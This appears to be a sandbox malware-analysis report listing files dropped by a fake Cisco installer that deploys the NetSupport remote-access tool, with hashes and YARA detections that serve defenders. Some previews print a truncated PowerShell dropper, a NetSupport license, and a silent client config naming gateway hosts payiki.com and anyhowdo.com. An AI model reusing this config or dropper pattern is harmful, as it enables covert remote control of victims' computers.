                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:Windows setup INFormation
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):3233
                                                                                                                                      Entropy (8bit):5.341509881686345
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:96:wYNZ3JpdhH+0dhH2EnEqZUmogaRvmL3dZMdr:wYH3JpdhH+0dhH/EqZUmoP+dZMdr
                                                                                                                                      MD5:0187FF566D704C12A49E4FBCE5E00C45
                                                                                                                                      SHA1:84BB1CECDD38FD203D2EE9691902C3FCCBDED366
                                                                                                                                      SHA-256:9EFBDCAD9BCD5A9B81AEA9B4643AD13799844117D8F41AA86882F808603037A2
                                                                                                                                      SHA-512:5C69EED3D00807A5ED8CB17981B23B50A4152E9044883DBB875011709C359CED146A83F740F0158E05C9C7ECE9AC52F5F9B15DE6128EE352A2424A7639708426
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:; vpnva-6.inf..;..; Cisco AnyConnect Virtual Miniport Adapter for Windows Setup File..;..; (c) Copyright 2004-2021 Cisco Systems, Inc.....[version]..Signature = "$Windows NT$"..Class = Net..ClassGUID = {4d36e972-e325-11ce-bfc1-08002be10318}..Provider = %Cisco%..CatalogFile = vpnva-6.cat..DriverVer = 12/14/2021,4.10.05040.0....[Manufacturer]..%CISCO%..= Cisco, NTamd64....[ControlFlags]..ExcludeFromSelect = *....[Cisco]..%vpnva.DeviceDesc% = Cisco.ndi.NTx86, vpnva....[Cisco.NTamd64]..%vpnva.DeviceDesc64% = Cisco.ndi.NTamd64, vpnva....[Cisco.ndi.NTx86]..Characteristics = 0x01 ; NCF_VIRTUAL..;BusType not required because this is not NCF_PHYSICAL..*IfType = 6 ; IF_TYPE_ETHERNET_CSMACD..*MediaType = 0 ; NdisMedium802_3..*PhysicalMediaType = 0 ; NdisPhysicalMediumUnspecified..AddReg...= Cisco.reg..CopyFiles..= Cisco.CopyFiles....[Cisco.ndi.NTamd64]..Characteristics = 0x01 ; NCF_VIRTUAL..;BusType not required because this is not NC
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PE32+ executable (native) x86-64, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):54176
                                                                                                                                      Entropy (8bit):6.343089804418659
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:1536:/eDOHgIUkjxLqAW2ltHbfvFSzNhQxVBqv5jJwPB2M:2KHgIUkjxLqAW2l5vFSzNiqv51m
                                                                                                                                      MD5:98B8845F3554BAD1329541D54EADD3F0
                                                                                                                                      SHA1:FDB21CC76F860AB39D265A01846C81A707078BBB
                                                                                                                                      SHA-256:506AB485FE0DA85C6DF6D0B7ABBAD412ACA6A8EB3F575DFC2C81662107054792
                                                                                                                                      SHA-512:12D14D027679FE76820148D51A9B8AEAF5D024C5D49A85238B2D70780D05F046EEAB1F7A7EC8E50EE64851E3D9033443FF64E01FBCA35AE1AE56E5D09F4BB8D3
                                                                                                                                      Malicious:false
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):89192
                                                                                                                                      Entropy (8bit):7.008180217438666
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:1536:YWM3/1/n8silQ0Fu/ILuhcWnToIfJ9IOlIOOCxf8z5xP9YFxKQ:Je/8hWiuwLuhPTBfJ3vOCxf8JvQ
                                                                                                                                      MD5:DDD6A5364B689408B502CA21276645E1
                                                                                                                                      SHA1:B9B7643A8ADC0C1C0170DEB4834079572A0EC8D5
                                                                                                                                      SHA-256:6613A22498BD14CD46AC678F7B50675A084CA04FA923FE8F6D731C1CB703C324
                                                                                                                                      SHA-512:26661FD5918F6FDBA5C08C260534E484DC1D79A45E4797E64482B7B2E2CA8EBA1B6427984CF6072C08D5A88A3CA154F7DD1DAE73E91CB5A1D80B85B9B3DE10AC
                                                                                                                                      Malicious:false
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):3572797
                                                                                                                                      Entropy (8bit):6.528411015981411
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:98304:iJYVM+LtVt3P/KuG2ONG9iqLRQf333f5vQ:zVL/tnHGYiql7
                                                                                                                                      MD5:8DC38914AFC0BAD9776A0E318423667E
                                                                                                                                      SHA1:C976BC170F196FF0B3AAB87A5C82B250FE3BA6CF
                                                                                                                                      SHA-256:169388D6EFFE87EF5194BFA85629C974A340C8FD30F5947983F4E6B1DC484F0F
                                                                                                                                      SHA-512:C42BF863FD45E5BD3443E7C7808B677D2F5B11C2C46917A5E9EC1E473065E85AEAB583FBB6D9F50BCAA4FBE34CCC09ACF7EEB26A27B7F9F73D7480E9C9036280
                                                                                                                                      Malicious:false
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:InnoSetup Log Cisco Systems {EF90E41D-A35E-4C1A-83A3-7A15A5DFB72B}, version 0x418, 6157753 bytes, 305090\37\user\, C:\Program Files (x86)\Cisco\376\377\377\0
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):6157753
                                                                                                                                      Entropy (8bit):4.028727097017294
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:49152:5eCH0IFlruozvPekdbzer0sHhsRirMlfXh2LhxpxRm:L
                                                                                                                                      MD5:918FCEF196D24572E4C2FC1825C1A104
                                                                                                                                      SHA1:E6ABD97ACA194E40D3BD67F1581364C31145B713
                                                                                                                                      SHA-256:EFCE16DB60323ACEE6B36443AD065348084495BB5391732178EAFB1DAC278345
                                                                                                                                      SHA-512:91EF2A01CB48171CA0C245EB0F6A05EE34BDE4DF51B9718B63B03E78FDEF3A750B1CB610C00E7F56119E2B1D05C689C56AB7C223DD73FA495D228D3458492D2F
                                                                                                                                      Malicious:true
                                                                                                                                      Yara Hits:
                                                                                                                                      • Rule: JoeSecurity_NetSupportDownloader, Description: Yara detected NetSupport Downloader, Source: C:\Program Files (x86)\Cisco\unins000.dat, Author: Joe Security
                                                                                                                                      Preview:Inno Setup Uninstall Log (b)....................................{EF90E41D-A35E-4C1A-83A3-7A15A5DFB72B}}.........................................................................................Cisco Systems.......................................................................................................................X.....]..................................................................................................................7...................y........3.0.5.0.9.0......e.n.g.i.n.e.e.r......C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.C.i.s.c.o....................... .......\...T..IFPS....#........................................................................................................ANYMETHOD.....................................................................BOOLEAN..............TWIZARDFORM....TWIZARDFORM.........TMAINFORM....TMAINFORM.........TUNINSTALLPROGRESSFORM....TUNINSTALLPROGRESSFORM.........TEXECWAIT.........TSETUPSTEP.....u...........!MAIN....-1.v.
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):3572797
                                                                                                                                      Entropy (8bit):6.528411015981411
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:98304:iJYVM+LtVt3P/KuG2ONG9iqLRQf333f5vQ:zVL/tnHGYiql7
                                                                                                                                      MD5:8DC38914AFC0BAD9776A0E318423667E
                                                                                                                                      SHA1:C976BC170F196FF0B3AAB87A5C82B250FE3BA6CF
                                                                                                                                      SHA-256:169388D6EFFE87EF5194BFA85629C974A340C8FD30F5947983F4E6B1DC484F0F
                                                                                                                                      SHA-512:C42BF863FD45E5BD3443E7C7808B677D2F5B11C2C46917A5E9EC1E473065E85AEAB583FBB6D9F50BCAA4FBE34CCC09ACF7EEB26A27B7F9F73D7480E9C9036280
                                                                                                                                      Malicious:false
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Icon number=0, Archive, ctime=Fri Nov 1 10:11:22 2024, mtime=Fri Nov 1 10:11:22 2024, atime=Tue Aug 15 15:45:32 2023, length=3058280, window=hide
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1482
                                                                                                                                      Entropy (8bit):4.49729904029476
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:8mdWEVdOEa2dvBl3Qbs6DqOg/k83EA7A8Md/731d/kmfUUPPqygm:8mdJVdOH2fqVukmT7A8Md/z1d/kmMtyg
                                                                                                                                      MD5:418022EE9ECDF0084465CA5E95982D11
                                                                                                                                      SHA1:34631B49C05BCC141332DA5F198768A40040352E
                                                                                                                                      SHA-256:54F3A93BFC69ED4D2724C49323E29F449D868F11FACD2BCE12638ABF9826B04B
                                                                                                                                      SHA-512:CDC15713F240756EC7C3358FF566E54DA388EBA394C5DA5B08464E0968445B7EB3691D5F2A6C8F432629272F51378D6FFBF6CB33F38C23D04CC39E09A7B7227D
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:L..................F.... .......N,...X..N,.........h......................./....P.O. .:i.....+00.../C:\.....................1.....aY]Y..PROGRA~2.........O.IaY]Y....................V......OY.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.)...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.7.....P.1.....aYjY..Cisco.<......aYjYaYjY....)......................wA.C.i.s.c.o.....p.1.....aYkY..CISCOS~1..X......aYjYaYkY....9.........................C.i.s.c.o. .S.e.c.u.r.e. .C.l.i.e.n.t.....H.1.....aYlY..UI..6......aYlYaYlY...........................$..U.I.....`.2.h....W.. .csc_ui.exe..F......aYlYaYlY..............................c.s.c._.u.i...e.x.e.......m...............-.......l...........C........C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\csc_ui.exe..M.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.C.i.s.c.o.\.C.i.s.c.o. .S.e.c.u.r.e. .C.l.i.e.n.t.\.U.I.\.c.s.c._.u.i...e.x.e.3.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.C.i.s.c.o.\.C.i.s.c.o. .S.e.c.u.r.e. .C.l.i.e.n.t.
                                                                                                                                      Process:C:\Users\user\AppData\Roaming\Cisco\client32.exe
                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                      Category:modified
                                                                                                                                      Size (bytes):15
                                                                                                                                      Entropy (8bit):2.7329145639793984
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3:QJgTG:QkG
                                                                                                                                      MD5:8AB0D91EF06123198FFAC30AD08A14C7
                                                                                                                                      SHA1:46D83BB84F74D8F28427314C6084CC9AFE9D1533
                                                                                                                                      SHA-256:DB50064FEE42FB57DCFD9C4269A682331246224D6108A18DB83ABD400CCECA12
                                                                                                                                      SHA-512:1AA8560708AD663C4D5D0C2199E2CE472D11748EDA18848AAA3430C6F333BB04DA65DFFF4144BFEEA3860CA30F7F832EC64FF6D5B0731AC8878050601AC7A3A3
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:32.7767,-96.797
                                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1772
                                                                                                                                      Entropy (8bit):5.467257144692072
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:Qw1WSU4y4RQmFoUeWmfmZ9tlNWR831NTxy9001dqZ0:QyLHyIFKL3OZXW8noS01YZ0
                                                                                                                                      MD5:0BB3AD9F0073F53B183BFBA6ADC7337B
                                                                                                                                      SHA1:B30777E4EFEF6015A01F77A44E7D1BEBFB96B6DE
                                                                                                                                      SHA-256:9828666AE58B394E86856BE247F937276F6954B34CDDBA044F456CE7BF13DEFD
                                                                                                                                      SHA-512:BADE839362AD07AF504DDEAB2D43079CC6322D160173B49B3F13D0A70020C33BEF77C11FD8FE66A0BC1F8E57BB8C862432EE5516C4A48BCFF9E2A7DA6FD3E51D
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):60
                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                      Process:C:\Users\user\Desktop\CiscoSetup.exe
                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):3548672
                                                                                                                                      Entropy (8bit):6.54053651576307
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:98304:6JYVM+LtVt3P/KuG2ONG9iqLRQf333f5vC:LVL/tnHGYiqlz
                                                                                                                                      MD5:BFD84005E52425F9B8FE658B9663E1C4
                                                                                                                                      SHA1:49C54A003678DC14A19AC5D07C9BF053B8CD0683
                                                                                                                                      SHA-256:2EA785B8A4CF5C5FC457350A4C636DAC40137269A1A93D24C1083F1F77324D5D
                                                                                                                                      SHA-512:3E4E2A32F50C6BB200AF8A37C8653EF55E6D8FF47042266181546FD1CCF125A4FD5D2B7D8801D9179BF5E899C4992092895EE6F0D3F4E11AC8D5A1F40E5F82BF
                                                                                                                                      Malicious:true
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):6144
                                                                                                                                      Entropy (8bit):4.720366600008286
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
                                                                                                                                      MD5:E4211D6D009757C078A9FAC7FF4F03D4
                                                                                                                                      SHA1:019CD56BA687D39D12D4B13991C9A42EA6BA03DA
                                                                                                                                      SHA-256:388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
                                                                                                                                      SHA-512:17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
                                                                                                                                      Malicious:false
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:ASCII text, with very long lines (65337), with CRLF line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):3035662
                                                                                                                                      Entropy (8bit):5.9992843080053095
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:49152:Ae6uUAecyy1q8n4RkErBHwnnDkKKr9r6riooJc98haMA:f
                                                                                                                                      MD5:2D47F35F6EC3ABDFA6DF92CB13BEF294
                                                                                                                                      SHA1:16E532CAAC6B7176369F5FA29A869FFA0DEF8947
                                                                                                                                      SHA-256:85C3C72A135EE57914D27C563E9AE31F417AF72FA04AB2D3A09F10EB674455CB
                                                                                                                                      SHA-512:E6BE961E4F384749F621E3B14F2B1468F3218480DE3EEAA0C7A6448F70911FC942B30D1C135729EDEA9BD489C8B5F42FD255617A79428568DF2A58F9D6C0E134
                                                                                                                                      Malicious:true
                                                                                                                                      Yara Hits:
                                                                                                                                      • Rule: JoeSecurity_NetSupportDownloader, Description: Yara detected NetSupport Downloader, Source: C:\Users\user\AppData\Local\Temp\is-S9GUG.tmp\cispn.ps1, Author: Joe Security
                                                                                                                                      Preview:$ErrorActionPreference = "Stop";..Set-Location $Env:AppData;..$destinationPath = "$Env:AppData\Cisco";..if (Test-Path $destinationPath) {.. Remove-Item "$Env:AppData\temp_base64.txt";.. Exit;..};..$base64Content = "
                                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):93560
                                                                                                                                      Entropy (8bit):6.5461580255883876
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:1536:wrOxDJs/Ksdl0R1dBmhFXxRpP9JNvbnPUGI:3yXlQmhhHp9J9bnPTI
                                                                                                                                      MD5:4182F37B9BA1FA315268C669B5335DDE
                                                                                                                                      SHA1:2C13DA0C10638A5200FED99DCDCF0DC77A599073
                                                                                                                                      SHA-256:A74612AE5234D1A8F1263545400668097F9EB6A01DFB8037BC61CA9CAE82C5B8
                                                                                                                                      SHA-512:4F22AD5679A844F6ED248BF2594AF94CF2ED1E5C6C5441F0FB4DE766648C17D1641A6CE7C816751F0520A3AE336479C15F3F8B6EBE64A76C38BC28A02FF0F5DC
                                                                                                                                      Malicious:true
                                                                                                                                      Yara Hits:
                                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\Cisco\AudioCapture.dll, Author: Joe Security
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):328056
                                                                                                                                      Entropy (8bit):6.754723001562745
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6144:2ib5YbsXPKXd6ppGpwpbGf30IVFpSzyaHx3/4aY5dUilQpAf84lH0JYBAnM1OK/Y:2ib5YbsXioEgULFpSzya9/lY5SilQCfg
                                                                                                                                      MD5:2D3B207C8A48148296156E5725426C7F
                                                                                                                                      SHA1:AD464EB7CF5C19C8A443AB5B590440B32DBC618F
                                                                                                                                      SHA-256:EDFE2B923BFB5D1088DE1611401F5C35ECE91581E71503A5631647AC51F7D796
                                                                                                                                      SHA-512:55C791705993B83C9B26A8DBD545D7E149C42EE358ECECE638128EE271E85B4FDBFD6FBAE61D13533BF39AE752144E2CC2C5EDCDA955F18C37A785084DB0860C
                                                                                                                                      Malicious:true
                                                                                                                                      Yara Hits:
                                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\Cisco\HTCTL32.DLL, Author: Joe Security
                                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):259
                                                                                                                                      Entropy (8bit):5.103526864179364
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6:O/oPzQyak4xRPjwxXTkoaydDKHMoEEjLgpW2Mch6IXZNWYpPM/ioUBENLa8l6i7s:XbQyaZR7wxooT8JjjqW2Ma6aNBPM/ioc
                                                                                                                                      MD5:866C96BA2823AC5FE70130DFAAA08531
                                                                                                                                      SHA1:892A656DA1EA264C73082DA8C6E5F5728ABCB861
                                                                                                                                      SHA-256:6A7C99E4BD767433C25D6DF8DF81BAA99C05DD24FA064E45C306FF4D954E1921
                                                                                                                                      SHA-512:0DAFC66222BBFCB1558D9845EE4DDEB7A687561B08B86A07B66B120C22952A8082E041D9234D9C69C8ADE5D4DAE894D3F10AFD7BA6DD3F057A08FB5D57C42112
                                                                                                                                      Malicious:true
                                                                                                                                      Preview:1200..0xaeabfe5c....; NetSupport License File...; Generated on 13:16 - 19/09/2017........[[Enforce]]....[_License]..control_only=0..expiry=..inactive=0..licensee=GFHJJYU43..maxslaves=100000..os2=1..product=10..serial_no=NSM832428..shrink_wrap=0..transport=0..
                                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):18808
                                                                                                                                      Entropy (8bit):6.22028391196942
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:1ANeiOT8Z2b6SoVF6RRHaPrpF3o47jtd3hfwHjvud3hfwx7bjuh:1ANt+E2exrpxTSDuTuih
                                                                                                                                      MD5:A0B9388C5F18E27266A31F8C5765B263
                                                                                                                                      SHA1:906F7E94F841D464D4DA144F7C858FA2160E36DB
                                                                                                                                      SHA-256:313117E723DDA6EA3911FAACD23F4405003FB651C73DE8DEFF10B9EB5B4A058A
                                                                                                                                      SHA-512:6051A0B22AF135B4433474DC7C6F53FB1C06844D0A30ED596A3C6C80644DF511B023E140C4878867FA2578C79695FAC2EB303AEA87C0ECFC15A4AD264BD0B3CD
                                                                                                                                      Malicious:true
                                                                                                                                      Yara Hits:
                                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\Cisco\PCICHEK.DLL, Author: Joe Security
                                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):3642864
                                                                                                                                      Entropy (8bit):6.5156874906689275
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:49152:5fgiLcxYMP9Y7fPUVBS7jNOXhmSTwpa1ycVSENqb:5fhLcxYMePUCjzGS7
                                                                                                                                      MD5:214A714EF11C2C91162A9344BF8F2E50
                                                                                                                                      SHA1:B87886B6B1E48E5E54E3033BE9A73B67B5A5C282
                                                                                                                                      SHA-256:74DFCD891813058B29B0A70EC0A95F31CD5356F175AD3A492DAECBC52542E76F
                                                                                                                                      SHA-512:A785D390C7E066628C9894302CA10AC21BA79D9988523D5ABCB960870A39112D01984A86CDE0BCD3862D46D82696E35BA760D96A389C96553ECB1DB9C3A0D97D
                                                                                                                                      Malicious:true
                                                                                                                                      Yara Hits:
                                                                                                                                      • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: C:\Users\user\AppData\Roaming\Cisco\PCICL32.DLL, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\Cisco\PCICL32.DLL, Author: Joe Security
                                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):459760
                                                                                                                                      Entropy (8bit):6.678291257338415
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12288:suqhtvbez3wj9AP8Ah0DAmlse99fow3/qkxf5iJg0nTUtnTvm:s3htk/eHoJktEKITUFTvm
                                                                                                                                      MD5:69F72AD2DAD99FF0FBC7F2C671523014
                                                                                                                                      SHA1:8AAAB0955014B89CA794A51DD527D3AFE6F38A94
                                                                                                                                      SHA-256:23F17CC168CC82B8AE16F3FC041D4465E1B12E66DCAC1713F582F99303A740DD
                                                                                                                                      SHA-512:EA18D92790F52405027666B7501CF908426B9B57FEC4157A45D86387D50324E414644245269DC1A0567B27C6C4B7C4B323D692BF449ADD4797DFCD7101531349
                                                                                                                                      Malicious:true
                                                                                                                                      Yara Hits:
                                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\Cisco\TCCTL32.DLL, Author: Joe Security
                                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):121304
                                                                                                                                      Entropy (8bit):6.150456878585649
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:768:Wm8j0+RvW6XhBBxUcnRWIDDDDDDDDDDDDDDDDADDDDDDDDDDDDDDDDDDDDDDXDJg:WbpvWiLniepfxP91/bQxEj
                                                                                                                                      MD5:4F2D0F4A5BA798FA9E85379C7C4BD36E
                                                                                                                                      SHA1:E533F2318D232EF3E1B22BDD1D6B61C081C6D6EB
                                                                                                                                      SHA-256:AAA12A1AD8C748FBFD4C8F2E5023EC3481B18CB088B28737FC7E665163CFF41D
                                                                                                                                      SHA-512:4C338E4F87F5AC9E9339E663739B021F06D8EE48F7A5981CCDF85029888964E3C416331C7EC791933A6B3D56EC44BB3719A38039F625A25B86BA0264E3D2D609
                                                                                                                                      Malicious:true
                                                                                                                                      Yara Hits:
                                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe, Author: Joe Security
                                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):638
                                                                                                                                      Entropy (8bit):5.396410176198281
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:kA2yTumGSqX4Ba/vpVSxOZ7zH+SHCPfu8AeCYubluxWkdcJPPGY:kttm18mxONeSorbu8eJ3f
                                                                                                                                      MD5:74BEF725496CD35EEB6F6B94E1EDDDFD
                                                                                                                                      SHA1:616AB761A1429E982062009B5C319F796A60BA1B
                                                                                                                                      SHA-256:8E016CA1A0837CA5F7D87656FE4153ED8639D33ADBEE9B07A3D033DB44EEC2A7
                                                                                                                                      SHA-512:C7DCFF6FF56DE463B5AB4CE89A9C6BFE5A021CABF959DA1AEF6D0DF19FA22376BD1D30749AD7A95315078F8007AF496DE3754A26A8C6C15294F31982E4F945B1
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:0x562f5eff....[Client].._present=1..DisableReplayMenu=1..SecurityKey2=dgAAAFOeoOz0f0kq5efuvoPnH(MA..Protocols=3..SOS_RShift=0..DisableChat=1..Shared=1..ValidAddresses.TCP=*..silent=1..AlwaysOnTop=0..SOS_Alt=0..DisableMessage=1..SOS_LShift=0..DisableRequestHelp=1..SysTray=0..UnloadMirrorOnDisconnect=0..DisableChatMenu=1..DisableDisconnect=1..AutoICFConfig=1..Usernames=*....[_License]..quiet=1....[_Info]..Filename=C:\Users\Public\Pictures\client32-U.ini....[General]..BeepUsingSpeaker=0....[HTTP]..CMPI=60..GatewayAddress=payiki.com:443..GSK=FN9L=MBNHG;C=P@FFA;P?DAI9F<F..Port=443..SecondaryGateway=anyhowdo.com:443..SecondaryPort=443..
                                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):773968
                                                                                                                                      Entropy (8bit):6.901559811406837
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12288:nMmCy3nAgPAxN9ueqix/HEmxsvGrif8ZSy+rdQw2QRAtd74/vmYK6H3BVoe3z:MmCy3KxW3ixPEmxsvGrm8Z6r+JQPzV7z
                                                                                                                                      MD5:0E37FBFA79D349D672456923EC5FBBE3
                                                                                                                                      SHA1:4E880FC7625CCF8D9CA799D5B94CE2B1E7597335
                                                                                                                                      SHA-256:8793353461826FBD48F25EA8B835BE204B758CE7510DB2AF631B28850355BD18
                                                                                                                                      SHA-512:2BEA9BD528513A3C6A54BEAC25096EE200A4E6CCFC2A308AE9CFD1AD8738E2E2DEFD477D59DB527A048E5E9A4FE1FC1D771701DE14EF82B4DBCDC90DF0387630
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      File Type:Windows setup INFormation
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):328
                                                                                                                                      Entropy (8bit):4.93007757242403
                                                                                                                                      Encrypted:false
